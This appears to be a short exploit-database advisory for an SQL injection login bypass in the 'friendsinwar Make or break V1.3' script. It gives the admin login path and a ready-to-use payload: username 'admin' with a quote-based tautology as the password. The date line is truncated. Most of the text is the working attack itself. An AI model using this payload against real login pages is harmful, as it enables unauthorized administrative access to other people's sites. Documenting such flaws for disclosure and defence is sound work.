# Exploit Title: friendsinwar Make or break V1.3 SQL Injection (authbypass) Vulnerability# Date: 13.10.201# Exploit Author: d3b4g # Vendor Homepage: http://www.friendsinwar.com# Software Link: http://www.friendsinwar.com/script_demo/make_or_break/admin/login.php# Tested on: Windows 7# Blog: d3b4g.me----------------------------------------------------------------------------------() SQL Injection :
http://localhost/script_demo/make_or_break/admin/login.php
+ Use following information to bypass login.
User:admin
' or '1=1-end-